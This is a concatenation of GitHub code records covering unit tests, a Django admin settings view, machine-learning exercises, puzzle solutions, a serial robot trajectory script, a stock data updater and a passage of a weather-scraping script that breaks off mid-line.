= natsorted(row, key=lambda y: y.lower())\n                    rowpy[idx] = (') ').join(row)\n            self.assertListEqual(values, rowpy)\n\n        # Flush out\n\n        filepl.close()\n        filepy.close()\n\n\nif __name__ == '__main__':\n    if len(sys.argv) > 1:\n        TestEnumeration.oligolen = sys.argv.pop()\n        TestEnumeration.interestsp = sys.argv.pop()\n        TestEnumeration.species = sys.argv.pop()\n        TestEnumeration.geneid = sys.argv.pop()\n    unittest.main()\n","repo_name":"mumingpo/pfred-docker","sub_path":"pfred-django-backend/scripts/pfred/testenumoligout.py","file_name":"testenumoligout.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"20477555434","text":"from django.contrib import admin\nfrom django.views.generic import TemplateView\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom onthefly.utils import SUPPORTED_TYPES, convert\n\n\nclass AppSettingsView(TemplateView):\n    \"\"\"\n    Show current settings\n    \"\"\"\n    template_name = 'admin/onthefly_settings.html'\n\n    def get_context_data(self, *args, **kwargs):\n        context = super(AppSettingsView, self).get_context_data(\n            *args, **kwargs)\n        context.update({\n            'original_settings': sorted(\n                settings.get_original_settings_without_onthefly),\n            'onthefly_settings': settings.get_onthefly_settings\n        })\n        return context\n\n    def post(self, request, *args, **kwargs):\n        action_type = request.POST.get('actiontype')\n        name = request.POST.get('name')\n        if action_type == 'add_field':\n            original_value = settings.backend.get_value_from_original_settings(\n                name)\n            if original_value is None:\n                messages.error(\n                    request, 'NoneType objects can not be changed at runtime!')\n            elif type(original_value) not in SUPPORTED_TYPES:\n                messages.error(\n                    request,\n                    '%s is not supported to add ONTHEFLY settings!' % (\n                        type(original_value)), )\n            else:\n                settings.backend.add_field(name)\n                settings.backend.set_value(name, original_value)\n        elif action_type == 'delete_field':\n            settings.backend.delete_field(name)\n            settings.backend.delete_value(name)\n        elif action_type == 'set_value':\n            original_value = settings.backend.get_value_from_original_settings(\n                name)\n            if type(original_value) not in SUPPORTED_TYPES:\n                messages.error(\n                    request,\n                    '%s is not supported to add ONTHEFLY settings!' 
% (\n                        type(original_value)), )\n            value = request.POST.get('value')\n            converted_value = convert(value, type(original_value))\n            if converted_value is None:\n                messages.error(\n                    request,\n                    'Original value type is different than current type!')\n            else:\n                settings.backend.set_value(name, converted_value)\n        request.method = 'GET'\n        return self.get(request, *args, **kwargs)\n\n\nadmin.site.register_view('onthefly-settings/', 'Onthefly Settings',\n                         view=AppSettingsView.as_view())\n","repo_name":"baranbartu/onthefly","sub_path":"onthefly/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"2"} +{"seq_id":"27004243174","text":"# SVR\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nclass SVR:\n\n    def __init__(self, learning_rate=0.001, lambda_param=0.01, n_iters=1000):\n        self.lr = learning_rate\n        self.lambda_param = lambda_param\n        self.n_iters = n_iters\n        self.w = None\n        self.b = None\n\n\n    def fit(self, X, y):\n        n_samples, n_features = X.shape\n        self.w = np.zeros(n_features)\n        self.b = 0\n        for _ in range(self.n_iters):\n            for idx, x_i in enumerate(X):\n                self.w -= self.lr * (2 * self.lambda_param * self.w - np.dot(x_i, y[idx]))\n                self.b -= self.lr * y[idx]\n\n\n    def predict(self, X):\n        approx = np.dot(X, self.w) - self.b\n        return approx\n\n# Importing the dataset\ndataset = pd.read_csv('Position_Salaries.csv')\nX = dataset.iloc[:, 1:2].values\ny = dataset.iloc[:, 2].values\n\n# Splitting the dataset into the Training set and Test set\n\"\"\"from sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\"\"\"\n\n\"\"\"\nnote : here feature scaling is applied to the dependent variable as well\n\n\"\"\"\n\n\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nsc_y = StandardScaler()\nX = sc_X.fit_transform(X)\n# StandardScaler expects a 2D array, so reshape y before scaling and flatten afterwards\ny = sc_y.fit_transform(y.reshape(-1, 1)).ravel()\n\nmean_value = sum(y)/len(y)\nmax_value = max(y)\n\ny = (y - mean_value)/max_value\n\n\n\"\"\"\nnote : ***\n\n-> import the SVR class from sklearn's svm library\n-> create the regressor, calling the constructor with the parameter\n1) kernel = 'rbf'\n-> fit the regressor model on the independent and dependent variables\n\n\"\"\"\n\n\"\"\"\n# Fitting SVR to the dataset\nfrom sklearn.svm import SVR\nregressor = SVR(kernel = 'rbf')\nregressor.fit(X, y)\n\"\"\"\n\nregressor = SVR()\nregressor.fit(X, y)\n\n\n\n\n\"\"\"\nnote : To predict the value for a single independent variable value, pass it as\n-> np.array([[value]])\n\nnote :\n-> as feature scaling was applied to y, y_pred will be a feature-scaled value\n-> to get the actual value apply object.inverse_transform(y_pred)\n\n\"\"\"\n\n\n# Predicting a new result\ny_pred = regressor.predict(np.array([[6.5]]))\n\ny = y*max_value + mean_value\n\n# inverse_transform also expects a 2D array\ny_pred = sc_y.inverse_transform(y_pred.reshape(-1, 1)).ravel()\n\n# Visualising the SVR results\nplt.scatter(X, y, color = 'red')\nplt.plot(X, regressor.predict(X), color = 'blue')\nplt.title('Truth or Bluff (SVR)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualising the SVR results (for higher resolution and smoother curve)\nX_grid = np.arange(min(X), max(X), 0.01) # choice of 0.01 instead of 0.1 step because the data is feature scaled\nX_grid = X_grid.reshape((len(X_grid), 1))\nplt.scatter(X, y, color = 'red')\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\nplt.title('Truth or Bluff 
(SVR)')\nplt.xlabel('Position level')\nplt.ylabel('Salary')\nplt.show()","repo_name":"Mohit-007/MACHINE-LEARNING","sub_path":"Part 2 - Regression/Section 7 - Support Vector Regression (SVR)/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31463125386","text":"# -*- coding: UTF-8 -*-\nimport csv\n\"\"\"\nCSV file storage operations\n\"\"\"\n# 1. Writing\nwith open('data.csv', 'w', newline='') as csvfile:\n    writer = csv.writer(csvfile)\n    writer.writerow(['id', 'name', 'age'])\n    writer.writerow(['10001', 'Mike', 20])\n    writer.writerow(['10002', 'Bob', 22])\n    writer.writerow(['10003', 'Jordan', 21])\n\n# Write multiple rows at once\nwith open('data1.csv', 'w', newline='') as csvfile:\n    writer = csv.writer(csvfile)\n    writer.writerow(['id', 'name', 'age'])\n    writer.writerows([['1001', 'Mike', 20], ['1002', 'Bob', 23], ['1003', 'Curry', 21]])\n\n# Write rows as dictionaries\nwith open('data2.csv', 'w', newline='') as csvfile:\n    fieldnames = ['id', 'name', 'age']\n    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n    writer.writeheader()\n    writer.writerow({'id': '1001', 'name': 'Mike', 'age': 20})\n    writer.writerow({'id': '10002', 'name': 'Bob', 'age': 22})\n    writer.writerow({'id': '10003', 'name': 'Jordan', 'age': 21})\n# Append data to the existing file\nwith open('data2.csv', 'a', newline='') as csvfile:\n    fieldnames = ['id', 'name', 'age']\n    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n    writer.writerow({'id': 1004, 'name': 'curry', 'age': 234})\n\n# Write Chinese characters, fixing the encoding issue with encoding='utf-8'\nwith open('data2.csv', 'a', encoding='utf-8', newline='') as csvfile:\n    fieldnames = ['id', 'name', 'age']\n    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n    writer.writerow({'id': 1004, 'name': '王伟', 'age': 24})\n\n# Reading a CSV file\nwith open('data2.csv', 'r', encoding='utf-8', newline='') as csvfile:\n    reader = csv.reader(csvfile)\n    for row in reader:\n        print(row) # read line by line\n\nimport pandas as pd\n\n# Read the csv file with the pandas library\ndf = pd.read_csv('data2.csv')\nprint('csv file read with pandas:\\n', df)\n","repo_name":"cdlwhm1217096231/python3_spider","sub_path":"csv_demo.py","file_name":"csv_demo.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"34123559513","text":"from pytest_cases import fixture\nfrom pytest_cases import parametrize\nfrom pytest_cases import set_case_id\nimport torch\nfrom torch import nn\n\nfrom brevitas.nn import QuantConv1d\nfrom brevitas.nn import QuantConv2d\nfrom brevitas.nn import QuantConvTranspose1d\nfrom brevitas.nn import QuantConvTranspose2d\nfrom brevitas.nn import QuantIdentity\nfrom brevitas.nn import QuantLinear\nfrom brevitas.nn import TruncAvgPool2d\nfrom brevitas.quant.fixed_point import Int8ActPerTensorFixedPoint\nfrom brevitas.quant.fixed_point import Int8WeightPerTensorFixedPoint\nfrom brevitas.quant.scaled_int import Int8ActPerTensorFloat\nfrom brevitas.quant.scaled_int import Int8BiasPerTensorFloatInternalScaling\nfrom brevitas.quant.scaled_int import Int8WeightPerTensorFloat\nfrom brevitas.quant.scaled_int import Int32Bias\nfrom brevitas.quant.shifted_scaled_int import ShiftedUint8ActPerTensorFloat\nfrom brevitas.quant.shifted_scaled_int import ShiftedUint8WeightPerTensorFloat\n\nfrom ...conftest import SEED\n\nOUT_CH = 16\nIN_CH = 8\nIN_MEAN = 5\nIN_SCALE = 3\nFEATURES = 5\nKERNEL_SIZE = 3\nTOLERANCE = 1\n\nQUANTIZERS = {\n    'asymmetric_act_float': (Int8WeightPerTensorFloat, ShiftedUint8ActPerTensorFloat),\n    'asymmetric_weight_float': 
(ShiftedUint8WeightPerTensorFloat, Int8ActPerTensorFloat),\n 'symmetric_float': (Int8WeightPerTensorFloat, Int8ActPerTensorFloat),\n 'symmetric_fixed_point': (Int8WeightPerTensorFixedPoint, Int8ActPerTensorFixedPoint)}\nBIAS_QUANTIZERS = {\n 'bias_external_scale': (Int32Bias,),\n 'bias_internal_scale': (Int8BiasPerTensorFloatInternalScaling,)}\nQUANT_WBIOL_IMPL = [\n QuantLinear, QuantConv1d, QuantConv2d, QuantConvTranspose1d, QuantConvTranspose2d]\nBIT_WIDTHS = [4, 8, 10] # below 8, equal 8, above 8\nBIAS_BIT_WIDTHS = [8, 16, 32]\n\n\n@fixture\n@parametrize('impl', QUANT_WBIOL_IMPL, ids=[f'{c.__name__}' for c in QUANT_WBIOL_IMPL])\ndef quant_module_impl(impl):\n return impl\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef input_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef weight_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIT_WIDTHS, ids=[f'i{b}' for b in BIT_WIDTHS])\ndef output_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('bit_width', BIAS_BIT_WIDTHS, ids=[f'i{b}' for b in BIAS_BIT_WIDTHS])\ndef bias_bit_width(bit_width):\n return bit_width\n\n\n@fixture\n@parametrize('quantizers', QUANTIZERS.items(), ids=list(QUANTIZERS.keys()))\ndef weight_act_quantizers(quantizers):\n return quantizers\n\n\n@fixture\n@parametrize('quantizer', BIAS_QUANTIZERS.items(), ids=list(BIAS_QUANTIZERS.keys()))\ndef bias_quantizer(quantizer):\n return quantizer\n\n\n@fixture\n@parametrize('per_channel', [True, False])\ndef quant_module(\n quant_module_impl,\n weight_act_quantizers,\n input_bit_width,\n weight_bit_width,\n output_bit_width,\n bias_bit_width,\n bias_quantizer,\n per_channel):\n\n weight_act_quantizers_name, (weight_quant, io_quant) = weight_act_quantizers\n bias_quantizer_name, (bias_quant,) = bias_quantizer # pytest needs an iterable\n\n if quant_module_impl == QuantLinear:\n layer_kwargs = {'in_features': IN_CH, 'out_features': OUT_CH}\n else:\n layer_kwargs = {'in_channels': IN_CH, 'out_channels': OUT_CH, 'kernel_size': KERNEL_SIZE}\n\n class Model(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.conv = quant_module_impl(\n **layer_kwargs,\n bias=True,\n weight_quant=weight_quant,\n input_quant=io_quant,\n output_quant=io_quant,\n weight_bit_width=weight_bit_width,\n input_bit_width=input_bit_width,\n output_bit_width=output_bit_width,\n bias_bit_width=bias_bit_width,\n weight_scaling_per_output_channel=per_channel,\n bias_quant=bias_quant,\n return_quant_tensor=True)\n self.conv.weight.data.uniform_(-0.01, 0.01)\n\n def forward(self, x):\n return self.conv(x)\n\n torch.random.manual_seed(SEED)\n module = Model()\n yield module\n del module\n","repo_name":"Xilinx/brevitas","sub_path":"tests/brevitas/export/quant_module_fixture.py","file_name":"quant_module_fixture.py","file_ext":"py","file_size_in_byte":4276,"program_lang":"python","lang":"en","doc_type":"code","stars":963,"dataset":"github-code","pt":"2"} +{"seq_id":"26759975026","text":"# https://adventofcode.com/2021/day/3\r\nfrom collections import Counter\r\n\r\ndata_in = 'data.txt' # External data file\r\n\r\n\r\ndef load_data(file_in):\r\n \"\"\"Read in data.txt\"\"\"\r\n data = []\r\n with open(file_in) as cur_file:\r\n for line in cur_file.readlines():\r\n data.append(line.rstrip())\r\n return data\r\n\r\n\r\ndef part_one(data):\r\n \"\"\"Solution for the first task.\"\"\"\r\n\r\n gamma_rate = ''\r\n epsilon_rate = ''\r\n\r\n 
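# per bit position: the most common bit goes into the gamma rate, the least common into the epsilon rate\r\n    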
for index in range(len(data[0])):\r\n counts = Counter([x[index] for x in data])\r\n\r\n gamma_rate += str(counts.most_common()[0][0])\r\n epsilon_rate += str(counts.most_common()[-1][0])\r\n\r\n return int(gamma_rate, 2), int(epsilon_rate, 2)\r\n\r\n\r\ndef recursion(data, rating):\r\n \"\"\"Loop the list items bit by bit and on every loop advance\r\n only the values that contain the bit in the specific index.\"\"\"\r\n\r\n for index in range(len(data[0])):\r\n if len(data) > 1:\r\n bits = Counter([x[index] for x in data])\r\n\r\n if rating == 'oxygen':\r\n if len(set(bits.values())) == 1:\r\n val = '1'\r\n else:\r\n val = bits.most_common()[0][0]\r\n else: # co2\r\n if len(set(bits.values())) == 1:\r\n val = '0'\r\n else:\r\n val = bits.most_common()[-1][0]\r\n\r\n data = [x for x in data if x[index] == val]\r\n else:\r\n return data[0]\r\n return data[0]\r\n\r\n\r\ndef part_two(data):\r\n \"\"\"Solution for the 2nd task.\"\"\"\r\n oxygen_rating = recursion(data, 'oxygen')\r\n co2_rating = recursion(data, 'co2')\r\n\r\n return int(oxygen_rating, 2), int(co2_rating, 2)\r\n\r\n\r\ndef main():\r\n \"\"\"Main logic.\"\"\"\r\n data = load_data(data_in)\r\n\r\n gamma, epsilon = part_one(data)\r\n print(f'Answer is {gamma * epsilon}') # 3813416\r\n\r\n oxygen, co2 = part_two(data)\r\n print(f'Answer is {oxygen * co2}') # 2990784\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Viittis/Advent-of-code-2021","sub_path":"d3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22217450220","text":"\"\"\"\nURL: https://leetcode.com/problems/permutations/description/\n\"\"\"\n\n\nclass Solution:\n\n def permute(self, nums: list[int]) -> list[list[int]]:\n\n result = []\n\n def backtrack(current, nums):\n\n if current == len(nums):\n result.append(nums[:])\n return\n\n for i in range(current, len(nums)):\n\n nums[i], nums[current] = nums[current], nums[i]\n backtrack(current + 1, nums)\n nums[i], nums[current] = nums[current], nums[i]\n\n backtrack(0, nums)\n\n return result\n\n\nc = Solution()\n\nnums = [1, 2, 3]\n\nprint(len(c.permute(nums)))","repo_name":"Tricar5/edu_algo","sub_path":"leetcode/backtrack/78_Permutations.py","file_name":"78_Permutations.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"29901050452","text":"import serial\nimport cv2\nfrom time import sleep\nfrom math import sqrt,atan2,degrees,sin,cos\n\ndef Targectory_Gen(x1,y1,x2,y2):\n P1 = (x1,y1)\n P2 = (x2,y2)\n delta_x = P2[0]-P1[0]\n delta_y = P2[1]-P1[1]\n r = sqrt(pow(delta_x,2)+pow(delta_y,2))\n \n Theta = atan2(delta_y,delta_x)\n return int(r),int(degrees(Theta))+180, int(r*cos(Theta)) , int(r*sin(Theta))\n\ndef bytesy(integer):\n return divmod(integer, 0x100)\n\n\nser = serial.Serial(\n port = \"COM9\",\n baudrate = 115200,\n timeout=1\n)\n\nser.rts = 0\nsleep(1)\nbyte_start = 0xBD\nbyte_id = 0x40\n\nP1 = (0,0)\nP2 = (50,50)\npose,theta,X,Y = Targectory_Gen(*P1,*P2)\nt = int(pose*154/11)\nprint(\"r =\" + str(pose))\nprint(\"X =\" + str(X))\nprint(\"Y =\" + str(Y))\nprint(\"Theta = \"+str(theta))\nprint(\"time =\"+str(t))\n\npose_highbyte , pose_lowbyte = bytesy(pose)\nt_highbyte , t_lowbyte = bytesy(t)\ntheta_highbyte , theta_lowbyte = bytesy(theta)\ndata = 
bytearray([byte_start,byte_id,pose_highbyte,pose_lowbyte,t_highbyte,t_lowbyte,theta_highbyte,theta_lowbyte])\n\ncheckSumOrdList = data[1:]\ncheckSumOrdListSum = sum(checkSumOrdList)\nCheckSum = ( ~(checkSumOrdListSum) % 256 ) % 256\ndata.extend(bytes([CheckSum]))\nkuy = [byte_start,byte_id,pose_highbyte,pose_lowbyte,t_highbyte,t_lowbyte,theta_highbyte,theta_lowbyte,CheckSum]\nkuy = \" \".join(str(x) for x in kuy)\nprint(kuy)\nprint(data)\n# ser.write(data)\nsleep(0.2)\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.readline())\n# print(ser.read())\n# while(1):\n# print(ser.readline())\n\n\n# ser.close()\n","repo_name":"aminballoon/flush_bot","sub_path":"Old_Version/Flush_Communication/Serial_Trajectory.py","file_name":"Serial_Trajectory.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17536094327","text":"import numpy as np;\nfrom src import DeepNeuralNetworkStarter as DNNS;\nimport matplotlib.pyplot as plt;\n\ndesent_optimzation_map = {};\ndesent_optimzation_map[0] = \"No_momentum\";\ndesent_optimzation_map[1] = \"Poly\";\ndesent_optimzation_map[2] = \"Nestrov\";\ndesent_optimzation_map[3] = \"Adam\";\ndesent_optimzation_map[4] = \"RMSProp\";\n\n\ndef accuracy(Y_pred, Y_label):\n Y = np.argmax(Y_pred, axis=0)\n correct = 0\n Y_label = Y_label.flatten()\n for i in range(Y_label.size):\n if Y[i] == Y_label[i]:\n correct += 1\n return correct / Y_label.size * 100\n\n\ndef indices_to_one_hot(data, nb_classes):\n \"\"\"Convert an iterable of indices to one-hot encoded labels.\"\"\"\n targets = np.array(data).reshape(-1)\n return np.eye(nb_classes)[targets]\n\n\ndef unison_shuffled_copies(a, b):\n assert len(a) == len(b);\n p = np.random.permutation(len(a));\n return a[p].T, b[p].T;\n\n\ndef getTrainAndValidationAccuracy(train_data_act, train_label_act, validation_data, validation_label, parameters):\n # compute the accuracy for training set, validation set and testing set by predicting them first\n trPred, train_loss = DNNS.classify(train_data_act, parameters, train_label_act);\n vdPred, validation_loss = DNNS.classify(validation_data, parameters, validation_label);\n trAcc = accuracy(trPred, train_label_act);\n valAcc = accuracy(vdPred, validation_label);\n print(\"Accuracy for training set is {0:0.3f} %\".format(trAcc));\n print(\"Accuracy for validation set is {0:0.3f} %\".format(valAcc));\n\n\ndef plotWithCosts(num_iterations, costList, is_batch_comparision=True, net_dims=[], batch_size=5000, total_size=5000):\n # PLOT of costs vs iterations\n # here plot our results where our x axis would be the 1 to no. 
of iteration with interval of 10\n    # y axis would be costs list for training and validation set\n\n    precisionSize = 1/(total_size/batch_size);\n    iterations = [i for i in np.arange(0, num_iterations, precisionSize)];\n    for key in costList:\n        label = \"\";\n        if is_batch_comparision:\n            label = \"Batch size of \" + str(key);\n            precisionSize = 1 / (total_size / key);\n            iterations = [i for i in np.arange(0, num_iterations, precisionSize)];\n        else:\n            label = desent_optimzation_map[key];\n        plt.plot(iterations, costList[key], label=label);\n    plt.legend();\n    plt.title(\"Training errors for %s dimensions multi layer neurons\" % str(net_dims[:len(net_dims) - 1]));\n    plt.show();\n","repo_name":"chiragasu/FSL-Final-Project","sub_path":"src/UtilityFunctions.py","file_name":"UtilityFunctions.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"2093855942","text":"import spacy\n\nnlp = spacy.blank(\"fr\")\n\n# Process the text\ndoc = nlp(\n    \"En 1990, plus de 60 % de la population d'Asie orientale vivait dans une pauvreté extrême. \"\n    \"Actuellement c'est moins de 4 %.\"\n)\n\n# Iterate over the tokens in the doc\nfor token in doc:\n    # Check whether the token resembles a number\n    if token.like_num:\n        # Get the next token in the document\n        next_token = doc[token.i + 1]\n        # Check whether the next token's text equals \"%\"\n        if next_token.text == \"%\":\n            print(\"Percentage found:\", token.text)\n","repo_name":"explosion/spacy-course","sub_path":"exercises/fr/solution_01_04.py","file_name":"solution_01_04.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"fr","doc_type":"code","stars":2221,"dataset":"github-code","pt":"2"} +{"seq_id":"25420508536","text":"import collections\n\n\nclass P1:\n    def makeGood(self, s: str) -> str:\n        A = list(s)\n        i = 0\n        while i+1 < len(A):\n            if abs(ord(A[i+1]) - ord(A[i])) == abs(ord('A') - ord('a')):\n                del A[i:i+2]\n                continue\n            i+=1 \n        ret = \"\".join(A) \n        return ret if ret == s else self.makeGood(ret)\n\nclass P2:\n    def findKthBit(self, n: int, k: int) -> str:\n        A = [0]\n        for _ in range(n-1):\n            A = A + [1] + [*map(lambda x: x^1, A)][::-1]\n        return str(A[k-1]) \n\nclass P3:\n    def maxNonOverlapping(self, nums: [int], target: int) -> int:\n        last = collections.defaultdict(int)\n        last[0] = -1\n        cur = ret = 0\n        ep = -2\n        for i,x in enumerate(nums):\n            cur += x\n            y = cur - target \n            if y in last and last[y] >= ep:\n                ep = i\n                ret += 1\n            last[cur] = i \n        return ret \nclass P4:\n    def minCost(self, n: int, cuts: [int]) -> int:\n        cuts = [0,n] + cuts\n        cuts = sorted(cuts)\n        A = [cuts[i+1] - cuts[i] for i in range(len(cuts)-1)]\n        return self.mergeStones(A, 2)\n\n    def mergeStones(self, stones: [int], K: int) -> int:\n        N = len(stones)\n        if (N - 1) % (K - 1): return -1\n        prefix = [0] * (N+1)\n        for i in range(1,N+1): prefix[i] = stones[i-1] + prefix[i-1]\n        dp = [[0] * N for _ in range(N)]\n        for m in range(K, N+1):\n            for i in range(N-m+1):\n                dp[i][i+m-1] = min(dp[i][k] + dp[k+1][i+m-1] for k in range(i, i+m-1, K-1)) + (prefix[i+m] - prefix[i] if (m-1)%(K-1) == 0 else 0)\n        return dp[0][N-1]\n\nif __name__ == \"__main__\":\n    print(\"Build Success!\")","repo_name":"dylansun/LeetcodeContest","sub_path":"src_python3/C200_209/C201.py","file_name":"C201.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"20357231826","text":"def tft_98(h1: list, h2: list, counter=100):\n    if len(h1) == 0:\n        return 
\"C\"\n elif len(h1) >= int(counter - 2):\n return \"D\"\n counter_d = 0\n for _ in range(len(h2)):\n if h2[_ - 1] == \"D\":\n counter_d += 1\n if counter_d > round(counter / 13):\n return \"D\"\n else:\n return h2[len(h2) - 1]","repo_name":"artemka169/prisoners_dilemma","sub_path":"artem.py","file_name":"artem.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14069001654","text":"\"\"\"\nThis file updates stock information every minute to allow live updates and day trading\n\"\"\"\n\nimport time\nfrom abc import abstractmethod\nfrom datetime import datetime\nfrom threading import Lock, Thread\nfrom typing import List\n\nfrom src import crud\nfrom src.db.session import SessionThreadLocal\nfrom src.schemas.time_series import TimeSeriesDBcreate\n\nfrom .data_provider import DataProvider\n\n\nclass RepeatedUpdateProvider(DataProvider):\n \"\"\"\n Update stock data repeatedly, where update time are determined\n by [repeat_in_x_seconds] (see RepeatScheduler)\n \"\"\"\n\n def __init__(self, symbol_to_exchange, repeat_in_x_seconds, db, **kwargs):\n super().__init__(**kwargs)\n\n self._symbols = list(symbol_to_exchange.keys())\n self.symbol_to_exchange = symbol_to_exchange\n self.db = db\n\n self.repeat_in_x_seconds = repeat_in_x_seconds\n\n self._data = {}\n self.id = 0\n\n self.lock = Lock()\n\n def pre_start(self):\n crud.stock.remove_all_hist(db=self.db)\n\n def on_start(self):\n \"\"\"\n Initialise db\n \"\"\"\n data = self.get_init_data()\n print(\"===== INITIALISING MARKET DATA =====\")\n for symbol, stock_data in data.items():\n print(f\"Number of entries for {symbol}: {len(stock_data)}\")\n time_series = stock_data_as_time_series(symbol, stock_data)\n crud.stock.update_time_series(db=self.db, symbol=symbol, time_series=time_series)\n print(\"===== FINISHED INITIALISATION =====\")\n self.cache_latest_data(data)\n\n RepeatScheduler(self.update, self.repeat_in_x_seconds).start()\n\n @abstractmethod\n def get_init_data(self):\n \"\"\"\n Returns data to initialise the db with\n \"\"\"\n pass\n\n def update(self):\n \"\"\"\n Retrieve data, update db and [self]'s cache\n \"\"\"\n data = self.get_update_data()\n for symbol, stock_data in data.items():\n time_series = stock_data_as_time_series(symbol, stock_data)\n crud.stock.update_time_series(db=SessionThreadLocal(), symbol=symbol, time_series=time_series)\n self.cache_latest_data(data)\n self.notify()\n\n @abstractmethod\n def get_update_data(self):\n \"\"\"\n Returns data to update the db with\n \"\"\"\n pass\n\n def cache_latest_data(self, msg):\n \"\"\"\n Cache part of the data so that they can be directly accessed without db\n \"\"\"\n with self.lock:\n temp = {**self._data} # shallow copy\n\n for symbol, data in msg.items():\n temp[symbol] = dict(\n curr_day_open=float(data[0][\"open\"]),\n curr_day_close=float(data[0][\"close\"]),\n prev_day_close=float(data[1][\"close\"]),\n )\n\n # switch out references\n with self.lock:\n self._data = temp\n self.id += 1\n\n @property\n def data_with_id(self):\n with self.lock:\n return (self._data, self.id)\n\n def get_stock(self, symbol):\n \"\"\"\n Get stock given [symbol]\n \"\"\"\n return crud.stock.get_by_symbol(db=self.db, symbol=symbol)\n\n @property\n def symbols(self):\n return self._symbols\n\n\ndef stock_data_as_time_series(symbol, stock_data) -> List[TimeSeriesDBcreate]:\n def to_timeseries_schema(day_data):\n return TimeSeriesDBcreate(\n date=day_data[\"datetime\"],\n symbol=symbol,\n 
low=day_data[\"low\"],\n high=day_data[\"high\"],\n open=day_data[\"open\"],\n close=day_data[\"close\"],\n volume=day_data[\"volume\"],\n )\n\n return [to_timeseries_schema(x) for x in stock_data]\n\n\ndef seconds_until_next_minute(at_second=15):\n \"\"\"\n e.g. if at_second=15, return the number of seconds\n until the next minute, at the 15 seconds mark\n\n i.e.:\n - if now() is 10:05:10, then returns 10:06:15\n - if now() is 10:05:20, then returns 10:06:15\n \"\"\"\n return 60 + at_second - datetime.now().second\n\n\nclass RepeatScheduler(Thread):\n \"\"\"\n Repeatedly executes [callback] at times specified by [repeat_in_x_seconds],\n which could either be a function or a literal number\n \"\"\"\n\n def __init__(self, callback, repeat_in_x_seconds):\n super().__init__()\n self.daemon = True\n self.callback = callback\n self.repeat_in_x_seconds = repeat_in_x_seconds\n\n def run(self):\n while True:\n if callable(self.repeat_in_x_seconds):\n x = self.repeat_in_x_seconds()\n else:\n x = self.repeat_in_x_seconds\n\n time.sleep(x)\n self.callback()\n","repo_name":"xpire/cs3900-project","sub_path":"backend/src/domain_models/data_provider/repeated_update_provider.py","file_name":"repeated_update_provider.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32783014236","text":"import datetime\r\nimport re\r\n\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup as bs\r\n\r\n# Адрес страницы и название файла с результатом\r\nURL_TEMPLATE = \"https://pogodaspb.info/arch.php?date=ymd\"\r\nFILE_NAME = \"Weather.csv\"\r\n\r\n\r\ndef parse(url, year):\r\n # Создание результирующего списка и указание года, откуда пойдёт чтение\r\n data = []\r\n if year % 4 == 0:\r\n leap_year = True\r\n else:\r\n leap_year = False\r\n day = 1\r\n month = 1\r\n date = datetime.date(year, 1, 1)\r\n\r\n # Указание последнего года\r\n while True:\r\n # Добавление в начало строки года, который рассматривается\r\n temp_list = []\r\n prec_list = []\r\n cur_date = date.strftime('%Y-%m-%d')\r\n cur_month = int(date.strftime('%m'))\r\n cur_year = int(date.strftime('%Y'))\r\n\r\n if cur_month != month:\r\n month = cur_month\r\n data.append('')\r\n if cur_year != year:\r\n return data\r\n\r\n # Изменение URL ссылки по-требуемому месяцу\r\n cur_url = url.replace('ymd', cur_date)\r\n # Отправка URL запроса\r\n r = requests.get(cur_url)\r\n # Считываем код страницы\r\n soup = bs(r.text, \"html.parser\")\r\n\r\n # Находим и считываем нужные нам элементы\r\n post = soup.find_all('p', {\"class\": \"h5 color1\"})\r\n for i in range(int(len(post) / 2)):\r\n temp = post[1 + 2 * i].text\r\n temp_list.append(float(temp[:-1]))\r\n post = soup.find_all('p', {\"class\": 